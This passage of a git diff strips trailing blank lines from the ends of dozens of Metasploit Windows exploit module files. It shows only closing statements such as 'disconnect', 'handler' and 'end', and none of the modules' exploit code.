Metasploit3 < Msf::Exploit::Remote } end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/apache_modjk_overflow.rb b/modules/exploits/windows/http/apache_modjk_overflow.rb index fa24a7b2bc..8a18057eb0 100644 --- a/modules/exploits/windows/http/apache_modjk_overflow.rb +++ b/modules/exploits/windows/http/apache_modjk_overflow.rb @@ -94,6 +94,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/badblue_ext_overflow.rb b/modules/exploits/windows/http/badblue_ext_overflow.rb index 39e38e3532..e59e0a224f 100644 --- a/modules/exploits/windows/http/badblue_ext_overflow.rb +++ b/modules/exploits/windows/http/badblue_ext_overflow.rb @@ -84,5 +84,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/badblue_passthru.rb b/modules/exploits/windows/http/badblue_passthru.rb index ae29250031..5993f53d8d 100644 --- a/modules/exploits/windows/http/badblue_passthru.rb +++ b/modules/exploits/windows/http/badblue_passthru.rb @@ -71,5 +71,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/ca_igateway_debug.rb b/modules/exploits/windows/http/ca_igateway_debug.rb index 4cc6b9f043..553abbe57e 100644 --- a/modules/exploits/windows/http/ca_igateway_debug.rb +++ b/modules/exploits/windows/http/ca_igateway_debug.rb @@ -89,6 +89,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect handler end - end - - + end \ No newline at end of file diff --git a/modules/exploits/windows/http/edirectory_host.rb b/modules/exploits/windows/http/edirectory_host.rb index c7e6af50e7..ad8ae8999f 100644 --- a/modules/exploits/windows/http/edirectory_host.rb +++ b/modules/exploits/windows/http/edirectory_host.rb @@ -78,5 +78,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/edirectory_imonitor.rb b/modules/exploits/windows/http/edirectory_imonitor.rb index 5933c7fe49..0fbe13b1a8 100644 --- a/modules/exploits/windows/http/edirectory_imonitor.rb +++ b/modules/exploits/windows/http/edirectory_imonitor.rb @@ -78,5 +78,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/hp_nnm.rb b/modules/exploits/windows/http/hp_nnm.rb index 2a377c8e0f..70262dd35b 100644 --- a/modules/exploits/windows/http/hp_nnm.rb +++ b/modules/exploits/windows/http/hp_nnm.rb @@ -69,5 +69,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/ia_webmail.rb b/modules/exploits/windows/http/ia_webmail.rb index e828b7167f..d010f45097 100644 --- a/modules/exploits/windows/http/ia_webmail.rb +++ b/modules/exploits/windows/http/ia_webmail.rb @@ -74,5 +74,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb index afc319cd4b..819126f361 100644 --- a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb +++ b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb @@ -222,5 +222,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/ibm_tsm_cad.rb b/modules/exploits/windows/http/ibm_tsm_cad.rb index 6f5c187a3f..84a284e072 100644 --- a/modules/exploits/windows/http/ibm_tsm_cad.rb +++ b/modules/exploits/windows/http/ibm_tsm_cad.rb @@ -71,5 +71,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/icecast_header.rb b/modules/exploits/windows/http/icecast_header.rb index 8e8d889789..74f77ed865 100644 --- a/modules/exploits/windows/http/icecast_header.rb +++ b/modules/exploits/windows/http/icecast_header.rb @@ -100,5 +100,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb index 7b76179a6a..aca891ede3 100644 --- a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb +++ b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb @@ -86,5 +86,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/mailenable_auth_header.rb b/modules/exploits/windows/http/mailenable_auth_header.rb index 1a7b703215..f412d9f73f 100644 --- a/modules/exploits/windows/http/mailenable_auth_header.rb +++ b/modules/exploits/windows/http/mailenable_auth_header.rb @@ -75,5 +75,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/maxdb_webdbm_database.rb b/modules/exploits/windows/http/maxdb_webdbm_database.rb index 7bd57188cb..b75c844cf5 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_database.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_database.rb @@ -90,5 +90,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb index 368b883b2c..cd5d3219ff 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb @@ -88,5 +88,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/mcafee_epolicy_source.rb b/modules/exploits/windows/http/mcafee_epolicy_source.rb index 5154a4cdcf..594d347686 100644 --- a/modules/exploits/windows/http/mcafee_epolicy_source.rb +++ b/modules/exploits/windows/http/mcafee_epolicy_source.rb @@ -119,6 +119,4 @@ class Metasploit3 < Msf::Exploit::Remote def wfs_delay 25 end - end - - + end \ No newline at end of file diff --git a/modules/exploits/windows/http/minishare_get_overflow.rb b/modules/exploits/windows/http/minishare_get_overflow.rb index 41d4ff1cdd..b9c3520d0e 100644 --- a/modules/exploits/windows/http/minishare_get_overflow.rb +++ b/modules/exploits/windows/http/minishare_get_overflow.rb @@ -78,5 +78,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/navicopa_get_overflow.rb b/modules/exploits/windows/http/navicopa_get_overflow.rb index 150dc048f2..7785b4713d 100644 --- a/modules/exploits/windows/http/navicopa_get_overflow.rb +++ b/modules/exploits/windows/http/navicopa_get_overflow.rb @@ -87,5 +87,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/novell_messenger_acceptlang.rb b/modules/exploits/windows/http/novell_messenger_acceptlang.rb index 4b21ecac82..bc2f737681 100644 --- a/modules/exploits/windows/http/novell_messenger_acceptlang.rb +++ b/modules/exploits/windows/http/novell_messenger_acceptlang.rb @@ -75,5 +75,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/nowsms.rb b/modules/exploits/windows/http/nowsms.rb index a7bbd5d52d..dffe6bd9c3 100644 --- a/modules/exploits/windows/http/nowsms.rb +++ b/modules/exploits/windows/http/nowsms.rb @@ -75,5 +75,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/oracle9i_xdb_pass.rb b/modules/exploits/windows/http/oracle9i_xdb_pass.rb index 95c134cddc..80fbae7741 100644 --- a/modules/exploits/windows/http/oracle9i_xdb_pass.rb +++ b/modules/exploits/windows/http/oracle9i_xdb_pass.rb @@ -93,5 +93,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/peercast_url.rb b/modules/exploits/windows/http/peercast_url.rb index ca460bb557..78769a0fca 100644 --- a/modules/exploits/windows/http/peercast_url.rb +++ b/modules/exploits/windows/http/peercast_url.rb @@ -76,5 +76,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/privatewire_gateway.rb b/modules/exploits/windows/http/privatewire_gateway.rb index 8bcc72bdc7..a9b9b8b3b9 100644 --- a/modules/exploits/windows/http/privatewire_gateway.rb +++ b/modules/exploits/windows/http/privatewire_gateway.rb @@ -78,5 +78,4 @@ class Metasploit3 < Msf::Exploit::Remote }, 2) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/psoproxy91_overflow.rb b/modules/exploits/windows/http/psoproxy91_overflow.rb index 96127d9697..5b6d3278ec 100644 --- a/modules/exploits/windows/http/psoproxy91_overflow.rb +++ b/modules/exploits/windows/http/psoproxy91_overflow.rb @@ -87,6 +87,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect handler end - end - - + end \ No newline at end of file diff --git a/modules/exploits/windows/http/sapdb_webtools.rb b/modules/exploits/windows/http/sapdb_webtools.rb index 027e87f2cc..b799320189 100644 --- a/modules/exploits/windows/http/sapdb_webtools.rb +++ b/modules/exploits/windows/http/sapdb_webtools.rb @@ -78,5 +78,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/savant_31_overflow.rb b/modules/exploits/windows/http/savant_31_overflow.rb index b270989f7a..ad1372c7b8 100644 --- a/modules/exploits/windows/http/savant_31_overflow.rb +++ b/modules/exploits/windows/http/savant_31_overflow.rb @@ -121,6 +121,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/shoutcast_format.rb b/modules/exploits/windows/http/shoutcast_format.rb index 3e0b583f0f..f7d38af9c6 100644 --- a/modules/exploits/windows/http/shoutcast_format.rb +++ b/modules/exploits/windows/http/shoutcast_format.rb @@ -108,5 +108,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/shttpd_post.rb b/modules/exploits/windows/http/shttpd_post.rb index a84bc4ded2..e224dd1149 100644 --- a/modules/exploits/windows/http/shttpd_post.rb +++ b/modules/exploits/windows/http/shttpd_post.rb @@ -79,5 +79,4 @@ include Msf::Exploit::Remote::Tcp disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/sybase_easerver.rb b/modules/exploits/windows/http/sybase_easerver.rb index 63c0f8e6dd..d0785af3e6 100644 --- a/modules/exploits/windows/http/sybase_easerver.rb +++ b/modules/exploits/windows/http/sybase_easerver.rb @@ -88,5 +88,4 @@ class Metasploit3 < Msf::Exploit::Remote sleep(4) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/trackercam_phparg_overflow.rb b/modules/exploits/windows/http/trackercam_phparg_overflow.rb index 570dfef262..c2ab46b25d 100644 --- a/modules/exploits/windows/http/trackercam_phparg_overflow.rb +++ b/modules/exploits/windows/http/trackercam_phparg_overflow.rb @@ -159,5 +159,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/trendmicro_officescan.rb b/modules/exploits/windows/http/trendmicro_officescan.rb index cd1ae41f42..0c1e56dd25 100644 --- a/modules/exploits/windows/http/trendmicro_officescan.rb +++ b/modules/exploits/windows/http/trendmicro_officescan.rb @@ -95,5 +95,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/xitami_if_mod_since.rb b/modules/exploits/windows/http/xitami_if_mod_since.rb index 3eae9579a9..f94176afea 100644 --- a/modules/exploits/windows/http/xitami_if_mod_since.rb +++ b/modules/exploits/windows/http/xitami_if_mod_since.rb @@ -93,6 +93,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/iis/ms01_023_printer.rb b/modules/exploits/windows/iis/ms01_023_printer.rb index 820eb0d686..e7349b8d10 100644 --- a/modules/exploits/windows/iis/ms01_023_printer.rb +++ b/modules/exploits/windows/iis/ms01_023_printer.rb @@ -116,5 +116,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/iis/ms01_033_idq.rb b/modules/exploits/windows/iis/ms01_033_idq.rb index 3ec6ca153d..c62e53aa91 100644 --- a/modules/exploits/windows/iis/ms01_033_idq.rb +++ b/modules/exploits/windows/iis/ms01_033_idq.rb @@ -79,5 +79,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/iis/ms02_018_htr.rb b/modules/exploits/windows/iis/ms02_018_htr.rb index d7634b05f6..7a19e3ebce 100644 --- a/modules/exploits/windows/iis/ms02_018_htr.rb +++ b/modules/exploits/windows/iis/ms02_018_htr.rb @@ -83,5 +83,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb index d5f6c16770..de2cf28a87 100644 --- a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb +++ b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb @@ -187,5 +187,4 @@ class Metasploit3 < Msf::Exploit::Remote return false end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/imap/eudora_list.rb b/modules/exploits/windows/imap/eudora_list.rb index 708f3e9764..1b55f1c262 100644 --- a/modules/exploits/windows/imap/eudora_list.rb +++ b/modules/exploits/windows/imap/eudora_list.rb @@ -83,5 +83,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/imap/imail_delete.rb b/modules/exploits/windows/imap/imail_delete.rb index 21b357a74e..e20cc93360 100644 --- a/modules/exploits/windows/imap/imail_delete.rb +++ b/modules/exploits/windows/imap/imail_delete.rb @@ -97,5 +97,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/imap/ipswitch_search.rb b/modules/exploits/windows/imap/ipswitch_search.rb index 87ec89c238..fc59dce573 100644 --- a/modules/exploits/windows/imap/ipswitch_search.rb +++ b/modules/exploits/windows/imap/ipswitch_search.rb @@ -77,5 +77,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/imap/mailenable_login.rb b/modules/exploits/windows/imap/mailenable_login.rb index 6398d7554e..0b68596f5d 100644 --- a/modules/exploits/windows/imap/mailenable_login.rb +++ b/modules/exploits/windows/imap/mailenable_login.rb @@ -76,5 +76,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/imap/mailenable_status.rb b/modules/exploits/windows/imap/mailenable_status.rb index 4e2f0bf32a..7da9d052c1 100644 --- a/modules/exploits/windows/imap/mailenable_status.rb +++ b/modules/exploits/windows/imap/mailenable_status.rb @@ -74,5 +74,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/imap/mailenable_w3c_select.rb b/modules/exploits/windows/imap/mailenable_w3c_select.rb index 3f19539904..c33283f8a6 100644 --- a/modules/exploits/windows/imap/mailenable_w3c_select.rb +++ b/modules/exploits/windows/imap/mailenable_w3c_select.rb @@ -80,5 +80,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/imap/mdaemon_cram_md5.rb b/modules/exploits/windows/imap/mdaemon_cram_md5.rb index 46a3f945d4..96f78a6b51 100644 --- a/modules/exploits/windows/imap/mdaemon_cram_md5.rb +++ b/modules/exploits/windows/imap/mdaemon_cram_md5.rb @@ -85,5 +85,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/imap/mdaemon_fetch.rb b/modules/exploits/windows/imap/mdaemon_fetch.rb index afaa2750e7..645a9770c8 100644 --- a/modules/exploits/windows/imap/mdaemon_fetch.rb +++ b/modules/exploits/windows/imap/mdaemon_fetch.rb @@ -100,6 +100,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb index b38009228d..e841f1ee88 100644 --- a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb +++ b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb @@ -75,5 +75,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/imap/mercur_login.rb b/modules/exploits/windows/imap/mercur_login.rb index c288363eed..04f6af201a 100644 --- a/modules/exploits/windows/imap/mercur_login.rb +++ b/modules/exploits/windows/imap/mercur_login.rb @@ -75,5 +75,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/imap/mercury_login.rb b/modules/exploits/windows/imap/mercury_login.rb index 8c9926112c..ab4b9a396b 100644 --- a/modules/exploits/windows/imap/mercury_login.rb +++ b/modules/exploits/windows/imap/mercury_login.rb @@ -95,5 +95,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/imap/mercury_rename.rb b/modules/exploits/windows/imap/mercury_rename.rb index ec0c1a663d..9e23d33912 100644 --- a/modules/exploits/windows/imap/mercury_rename.rb +++ b/modules/exploits/windows/imap/mercury_rename.rb @@ -80,5 +80,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/imap/novell_netmail_append.rb b/modules/exploits/windows/imap/novell_netmail_append.rb index 554a402213..0d1d7bc15e 100644 --- a/modules/exploits/windows/imap/novell_netmail_append.rb +++ b/modules/exploits/windows/imap/novell_netmail_append.rb @@ -73,5 +73,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/imap/novell_netmail_auth.rb b/modules/exploits/windows/imap/novell_netmail_auth.rb index 4c64284624..653ffc59b0 100644 --- a/modules/exploits/windows/imap/novell_netmail_auth.rb +++ b/modules/exploits/windows/imap/novell_netmail_auth.rb @@ -76,5 +76,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/imap/novell_netmail_status.rb b/modules/exploits/windows/imap/novell_netmail_status.rb index b6197eefa5..c20d4a0ed0 100644 --- a/modules/exploits/windows/imap/novell_netmail_status.rb +++ b/modules/exploits/windows/imap/novell_netmail_status.rb @@ -71,5 +71,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/imap/novell_netmail_subscribe.rb b/modules/exploits/windows/imap/novell_netmail_subscribe.rb index d97d8ca344..ca4354ebb9 100644 --- a/modules/exploits/windows/imap/novell_netmail_subscribe.rb +++ b/modules/exploits/windows/imap/novell_netmail_subscribe.rb @@ -72,5 +72,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/isapi/fp30reg_chunked.rb b/modules/exploits/windows/isapi/fp30reg_chunked.rb index d96322855c..44d6fb79a1 100644 --- a/modules/exploits/windows/isapi/fp30reg_chunked.rb +++ b/modules/exploits/windows/isapi/fp30reg_chunked.rb @@ -127,5 +127,4 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/isapi/ms00_094_pbserver.rb b/modules/exploits/windows/isapi/ms00_094_pbserver.rb index e05682b13d..b28f417934 100644 --- a/modules/exploits/windows/isapi/ms00_094_pbserver.rb +++ b/modules/exploits/windows/isapi/ms00_094_pbserver.rb @@ -87,5 +87,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/isapi/nsiislog_post.rb b/modules/exploits/windows/isapi/nsiislog_post.rb index 7f0e26a522..1931cf067e 100644 --- a/modules/exploits/windows/isapi/nsiislog_post.rb +++ b/modules/exploits/windows/isapi/nsiislog_post.rb @@ -110,5 +110,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb index 982c1d83b0..85a47a0d1f 100644 --- a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb +++ b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb @@ -100,5 +100,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/isapi/w3who_query.rb b/modules/exploits/windows/isapi/w3who_query.rb index 723050c09e..688cc05de3 100644 --- a/modules/exploits/windows/isapi/w3who_query.rb +++ b/modules/exploits/windows/isapi/w3who_query.rb @@ -119,5 +119,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/ldap/imail_thc.rb b/modules/exploits/windows/ldap/imail_thc.rb index 96bb71b739..7e1674b243 100644 --- a/modules/exploits/windows/ldap/imail_thc.rb +++ b/modules/exploits/windows/ldap/imail_thc.rb @@ -82,5 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/license/sentinel_lm7_udp.rb b/modules/exploits/windows/license/sentinel_lm7_udp.rb index e1631bec52..5d1221fa46 100644 --- a/modules/exploits/windows/license/sentinel_lm7_udp.rb +++ b/modules/exploits/windows/license/sentinel_lm7_udp.rb @@ -103,5 +103,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/lpd/hummingbird_exceed.rb b/modules/exploits/windows/lpd/hummingbird_exceed.rb index 1e6e71617b..14021f9e2c 100644 --- a/modules/exploits/windows/lpd/hummingbird_exceed.rb +++ b/modules/exploits/windows/lpd/hummingbird_exceed.rb @@ -74,5 +74,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/lpd/niprint.rb b/modules/exploits/windows/lpd/niprint.rb index eea6304e1c..cd782886ae 100644 --- a/modules/exploits/windows/lpd/niprint.rb +++ b/modules/exploits/windows/lpd/niprint.rb @@ -69,5 +69,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/lpd/saplpd.rb b/modules/exploits/windows/lpd/saplpd.rb index 325275d857..b7b49553f6 100644 --- a/modules/exploits/windows/lpd/saplpd.rb +++ b/modules/exploits/windows/lpd/saplpd.rb @@ -72,5 +72,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/lpd/wincomlpd_admin.rb b/modules/exploits/windows/lpd/wincomlpd_admin.rb index 895cd9a2e0..ef4847cfdf 100644 --- a/modules/exploits/windows/lpd/wincomlpd_admin.rb +++ b/modules/exploits/windows/lpd/wincomlpd_admin.rb @@ -73,5 +73,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb index 59a6130f1d..ee39dd4352 100644 --- a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb +++ b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb @@ -100,5 +100,4 @@ class Metasploit3 < Msf::Exploit::Remote service.close_client(client) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb index 50d6c9e9ed..e884b43a08 100644 --- a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb +++ b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb @@ -71,5 +71,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/bakbone_netvault_heap.rb b/modules/exploits/windows/misc/bakbone_netvault_heap.rb index b5ee7ca531..5251e24ede 100644 --- a/modules/exploits/windows/misc/bakbone_netvault_heap.rb +++ b/modules/exploits/windows/misc/bakbone_netvault_heap.rb @@ -159,5 +159,4 @@ class Metasploit3 < Msf::Exploit::Remote 5 end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/bigant_server.rb b/modules/exploits/windows/misc/bigant_server.rb index 0f92853018..2434bf1ab3 100644 --- a/modules/exploits/windows/misc/bigant_server.rb +++ b/modules/exploits/windows/misc/bigant_server.rb @@ -73,5 +73,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/bomberclone_overflow.rb b/modules/exploits/windows/misc/bomberclone_overflow.rb index b51face7d8..d7f6ed9881 100644 --- a/modules/exploits/windows/misc/bomberclone_overflow.rb +++ b/modules/exploits/windows/misc/bomberclone_overflow.rb @@ -78,5 +78,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/borland_interbase.rb b/modules/exploits/windows/misc/borland_interbase.rb index 7ef7f7ec94..c9fafb1b40 100644 --- a/modules/exploits/windows/misc/borland_interbase.rb +++ b/modules/exploits/windows/misc/borland_interbase.rb @@ -71,5 +71,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/borland_starteam.rb b/modules/exploits/windows/misc/borland_starteam.rb index 8b807ece53..0c3d9c77ce 100644 --- a/modules/exploits/windows/misc/borland_starteam.rb +++ b/modules/exploits/windows/misc/borland_starteam.rb @@ -69,5 +69,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/doubletake.rb b/modules/exploits/windows/misc/doubletake.rb index e5581fa470..8ff95c1c66 100644 --- a/modules/exploits/windows/misc/doubletake.rb +++ b/modules/exploits/windows/misc/doubletake.rb @@ -81,5 +81,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/eiqnetworks_esa.rb b/modules/exploits/windows/misc/eiqnetworks_esa.rb index a971e4a2a3..9182395046 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa.rb @@ -100,5 +100,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb index d4b049d4c3..806f365f1f 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb @@ -82,5 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/fb_isc_attach_database.rb b/modules/exploits/windows/misc/fb_isc_attach_database.rb index 00fa440f78..1ecba9485c 100644 --- a/modules/exploits/windows/misc/fb_isc_attach_database.rb +++ b/modules/exploits/windows/misc/fb_isc_attach_database.rb @@ -181,6 +181,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/fb_isc_create_database.rb b/modules/exploits/windows/misc/fb_isc_create_database.rb index 7ee0266464..bc0538c454 100644 --- a/modules/exploits/windows/misc/fb_isc_create_database.rb +++ b/modules/exploits/windows/misc/fb_isc_create_database.rb @@ -181,6 +181,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/fb_svc_attach.rb b/modules/exploits/windows/misc/fb_svc_attach.rb index 8329886e7f..d7252aaf44 100644 --- a/modules/exploits/windows/misc/fb_svc_attach.rb +++ b/modules/exploits/windows/misc/fb_svc_attach.rb @@ -143,6 +143,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/hp_ovtrace.rb b/modules/exploits/windows/misc/hp_ovtrace.rb index bcdf06dd7f..e3153b6044 100644 --- a/modules/exploits/windows/misc/hp_ovtrace.rb +++ b/modules/exploits/windows/misc/hp_ovtrace.rb @@ -71,5 +71,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/ib_isc_attach_database.rb b/modules/exploits/windows/misc/ib_isc_attach_database.rb index 620c4a9eed..971c5e24fc 100644 --- a/modules/exploits/windows/misc/ib_isc_attach_database.rb +++ b/modules/exploits/windows/misc/ib_isc_attach_database.rb @@ -177,6 +177,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/misc/ib_isc_create_database.rb b/modules/exploits/windows/misc/ib_isc_create_database.rb index a53b0f3471..5636c0dee1 100644 --- a/modules/exploits/windows/misc/ib_isc_create_database.rb +++ 